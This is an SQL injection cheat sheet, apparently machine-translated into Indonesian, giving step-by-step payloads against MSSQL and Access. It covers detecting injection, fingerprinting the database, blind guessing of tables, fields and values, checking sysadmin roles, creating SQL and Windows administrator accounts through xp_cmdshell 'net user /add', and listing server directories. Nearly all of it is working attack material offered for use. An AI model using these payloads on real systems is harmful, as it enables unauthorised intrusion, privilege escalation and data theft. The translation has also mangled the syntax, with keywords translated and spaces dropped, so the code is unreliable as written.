1. Tentukan apakah ada suntikan; dan1 = 1; dan1 = 2
2. Penilaian awal tentang apakah itu mssql; anduser> 0
3. Parameter injeksi adalah karakter 'dan [kondisi kueri] dan' '='
4. 'dan [kondisi kueri] dan'%25 '=' dari parameter yang difilter selama pencarian
5. Sistem Database Hakim
; dan (SelectCount (*) FromsysObjects)> 0MSSQL
; dan (SelectCount (*) FrommsysObjects)> 0Access
6. Tebak database; dan (selectCount (*) dari [nama basis data])> 0
7. Tebak lapangan; dan (selectCount (nama bidang) dari nama basis data)> 0
8. Tebak panjang rekaman di lapangan; dan (selecttop1len (nama bidang) dari nama basis data)> 0
9. (1) Tebak nilai ASCII dari bidang (akses)
; dan (selecttop1asc (mid (nama bidang, 1, 1)) dari nama basis data)> 0
(2) Tebak nilai ASCII bidang (MSSQL)
; dan (SELECTTOP1UNICODE (Substring (Nama Bidang, 1, 1)) dari nama basis data)> 0
10. Struktur Izin Uji (MSSQL)
; and1 = (selectiS_srvrolemember ('sysadmin'));-
; and1 = (selectiS_srvrolemember ('serveradmin'));-
; and1 = (selectiS_srvrolemember ('setupadmin'));-
; and1 = (selectiS_srvrolemember ('SecurityAdmin'));-
; and1 = (selection_srvrolemember ('diskadmin'));-
; and1 = (selectiS_srvrolemember ('bulkadmin'));-
; and1 = (selectiS_member ('db_owner'));-
11. Tambahkan Akun MSSQL dan Sistem
; execmaster.dbo.sp_addloginusername;-
; execmaster.dbo.sp_passwordnull, nama pengguna, kata sandi;-
; execmaster.dbo.sp_addsrvrolemembersysadminusername;-
; execmaster.dbo.xp_cmdshell'netuserusernamepassword
/workstation:*/kali: semua/kata sandichg: ya/kata sandi: ya/aktif: ya/add ';-
; execmaster.dbo.xp_cmdshell'netuserusernamepassword/add ';-
; execmaster.dbo.xp_cmdshell'NetLocalGroupAdMinistratorSusername/add ';--
12. (1) Transfer direktori
; CreateTableDirs (PathsVarchar (100), Idint)
; InsertDirsexecmaster.dbo.xp_dirtree'c:/'
; dan (selecttop1pathsfromdirs)> 0
; dan (selecttop1pathsfromdirswherePathsnotin ('jalur yang diperoleh dari langkah sebelumnya')>))
(2) melintasi direktori
; CreateTableTemp (IDNVARCHAR (255), NUM1NVARCHAR (255), NUM2NVARCHAR (255), NUM3NVARCHAR (255));-
; InsertTempExecmaster.dbo.xp_availablemedia; -Get semua drive saat ini
; insertIntotemp (id) execmaster.dbo.xp_subdirs'c:/';-Dapatkan daftar subdirektori
; insertIntotemp (id, num1) execmaster.dbo.xp_dirtree'c:/';-Dapatkan struktur pohon direktori dari semua subdirektori